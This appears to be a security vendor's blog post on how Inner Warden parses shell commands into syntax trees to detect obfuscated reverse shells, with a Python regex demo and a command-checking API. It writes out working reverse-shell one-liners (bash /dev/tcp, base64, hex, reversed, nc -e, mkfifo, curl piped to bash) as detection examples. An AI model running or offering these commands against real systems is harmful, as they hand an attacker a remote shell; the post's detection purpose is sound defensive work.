Threat Detection

How Inner Warden Catches Obfuscated Reverse Shells (Tree-Sitter AST, Not Regex)

Name: Inner Warden
Author: Inner Warden

March 29, 2026 · 10 min read

A reverse shell is often one of the first things an attacker establishes after gaining initial access. It connects your server back to the attacker's machine, giving them an interactive terminal. The problem: modern payloads are heavily obfuscated. They use hex encoding, base64 wrapping, printf substitution, and variable indirection to slip past regex-based detection rules that match on the literal command text.

Inner Warden does not use regex for command analysis. It parses commands into an Abstract Syntax Tree (AST) using tree-sitter and analyzes the structure, not the text. This catches obfuscated payloads that text pattern matching misses.

Why regex fails for reverse shell detection

A naive reverse shell looks like this:

Plain reverse shell

bash -i >& /dev/tcp/10.0.0.1/4444 0>&1

A regex can catch that. But attackers rarely send that. They send variants like these:

Hex-encoded payload

echo -e '\x62\x61\x73\x68\x20\x2d\x69' | bash

Base64-wrapped payload

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80NDQ0IDA+JjE= | base64 -d | bash

Printf substitution

$(printf '%s' 'bash' '-i' '>& /dev/tcp/10.0.0.1/4444')

Reversed string

echo '1&>0 4444/1.0.0.01/pct/ved/ &> i- hsab' | rev | bash

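In the hex, base64, and reversed variants, the string /dev/tcp never appears in the raw command, and the contiguous string bash -i appears in none of the four. A regex written for the plain form has nothing to match against, which is why pattern-based rules of the kind used with fail2ban, OSSEC, and most SIEMs miss these payloads.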
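The gap is easy to reproduce. The sketch below uses a hypothetical signature (`PLAIN_REVERSE_SHELL`, an assumption standing in for whatever rule a regex-based tool might ship) and runs it against the plain payload and three of the obfuscated variants from this section. It also decodes the base64 blob to confirm that the hidden command is the plain payload.

```python
import base64
import re

# Hypothetical signature for the plain form; real rule sets differ.
PLAIN_REVERSE_SHELL = re.compile(r"bash\s+-i\s+>&\s*/dev/tcp/")

PLAIN = "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
B64_BLOB = "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80NDQ0IDA+JjE="

# The commands are only inspected as strings here; nothing is executed.
OBFUSCATED = {
    "hex": r"echo -e '\x62\x61\x73\x68\x20\x2d\x69' | bash",
    "base64": f"echo {B64_BLOB} | base64 -d | bash",
    "reversed": "echo '" + PLAIN[::-1] + "' | rev | bash",
}


def regex_hits(command: str) -> bool:
    """True if the text signature matches anywhere in the raw command."""
    return PLAIN_REVERSE_SHELL.search(command) is not None


if __name__ == "__main__":
    print("plain:", regex_hits(PLAIN))
    for name, command in OBFUSCATED.items():
        print(f"{name}:", regex_hits(command))
    # Same payload once decoded, but invisible to the signature before that.
    print("base64 hides plain payload:",
          base64.b64decode(B64_BLOB).decode() == PLAIN)
```

The signature matches only the plain form. Adding one regex per encoding does not scale, because encodings can be nested and combined freely.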

How tree-sitter AST analysis works

Instead of matching text, Inner Warden parses the command into a syntax tree using tree-sitter. The tree represents the structure of the command: pipes, redirections, subshells, command substitutions, and string operations. The analysis walks the tree looking for structural patterns, not string patterns.

For the hex-encoded example above, the AST reveals:

Node type	pipeline
Left side	echo with hex escape sequences (\x62\x61...)
Right side	bash (shell interpreter)
Pattern match	Encoded data piped into interpreter = reverse shell

The key insight: however the payload is encoded, it still has to be decoded and handed to an interpreter, and that hand-off shows up in the AST. In the piped examples above, the tree always contains a pipeline where encoded or obfuscated data flows into a shell interpreter. Tree-sitter sees the structure. Regex sees the text.

Patterns Inner Warden detects

The check-command analysis engine covers these reverse shell families and obfuscation techniques:

Pattern	Example	AST signal
Python socket	`python -c 'import socket...'`	socket.socket + connect + subprocess
Perl socket	`perl -e 'use Socket...'`	use Socket + open + exec
mkfifo pipe	`mkfifo /tmp/f; cat /tmp/f \| bash`	mkfifo + pipe into interpreter
Bash hex escapes	`$'\x62\x61\x73\x68'`	ANSI-C quoting with hex sequences
eval + base64	`eval $(echo ... \| base64 -d)`	eval wrapping decoded substitution
printf build	`$(printf '\x2f\x64\x65\x76...')`	printf with hex in command substitution
rev pipe	`echo '...' \| rev \| bash`	string reversal piped into interpreter
Download + execute	`curl http://x.x/s \| bash`	network fetch piped into interpreter
Netcat variants	`nc -e /bin/sh 10.0.0.1 4444`	nc/ncat with -e flag + interpreter path

The check-command API

Inner Warden exposes a POST /api/agent/check-command endpoint that analyzes any command without executing it. This is designed for AI agents (OpenClaw, n8n, custom automation) that need to validate commands before running them.

Check an obfuscated reverse shell

curl -s http://localhost:9111/api/agent/check-command \
  -H "Content-Type: application/json" \
  -d '{"command": "echo YmFzaCAtaSA+Ji... | base64 -d | bash"}'

Response

{
  "safe": false,
  "risk": "critical",
  "reasons": [
    "base64 decode piped into shell interpreter (reverse shell pattern)",
    "encoded payload obscures true intent"
  ],
  "categories": ["reverse_shell", "obfuscation"]
}

A clean command returns "safe": true with no reasons. The analysis runs in under 5ms because tree-sitter parsing runs as compiled native code called from Rust. No network calls, no AI inference.
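For an agent written in Python, the same call can be made with the standard library. The sketch below assumes the URL and port from the curl example and the response fields shown above (`safe`, `risk`, `reasons`). The helper names are hypothetical, and failing closed when `safe` is missing is a design choice of this example, not documented API behavior.

```python
import json
import urllib.request

# URL and port taken from the curl example; adjust for your installation.
CHECK_URL = "http://localhost:9111/api/agent/check-command"


def build_request(command: str, url: str = CHECK_URL) -> urllib.request.Request:
    """Build the POST request carrying the command as a JSON body."""
    body = json.dumps({"command": command}).encode("utf-8")
    return urllib.request.Request(
        url,
        data=body,
        headers={"Content-Type": "application/json"},
        method="POST",
    )


def summarize(verdict: dict) -> tuple[bool, str]:
    """Map a response dict to (allowed, message); anything not safe is blocked."""
    if verdict.get("safe") is True:
        return True, "allowed"
    reasons = "; ".join(verdict.get("reasons", [])) or "no reason given"
    return False, f"blocked ({verdict.get('risk', 'unknown')}): {reasons}"


def check_command(command: str, timeout: float = 2.0) -> dict:
    """Send the command for analysis and return the parsed JSON verdict."""
    with urllib.request.urlopen(build_request(command), timeout=timeout) as resp:
        return json.load(resp)


if __name__ == "__main__":
    # Requires a running Inner Warden agent on localhost.
    allowed, message = summarize(check_command("ls -la /var/log"))
    print(allowed, message)
```

An agent would call `check_command` before every shell invocation and skip execution whenever `summarize` returns `False`.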

Comparison with regex-based tools

Tools like fail2ban, OSSEC, and most SIEM rules rely on regex patterns matched against log or command text. This works for known, unobfuscated payloads. It breaks down once the payload is encoded or assembled at runtime.

Capability	Regex tools	Inner Warden (AST)
Plain reverse shells	Detected	Detected
Base64-encoded payloads	Missed	Detected
Hex-escaped strings	Missed	Detected
printf/rev obfuscation	Missed	Detected
Variable indirection	Missed	Detected
Pre-execution analysis	No	Yes (API)
Latency	~1ms	<5ms

Set it up

The check-command endpoint is available on the agent dashboard. Install Inner Warden and the API is ready:

Install

curl -fsSL https://www.innerwarden.com/install | sudo bash

The exec_audit collector watches for suspicious commands in real time. The check-command API lets external tools validate commands before execution. Both use the same tree-sitter engine.

What to do next

Protect AI agents on your server - use the check-command API to validate every command your AI agent wants to run.
SSH honeypot setup - capture the reverse shell payloads attackers try to run on your server.
View on GitHub - the check-command engine is open source. Read the implementation, report false positives, contribute patterns.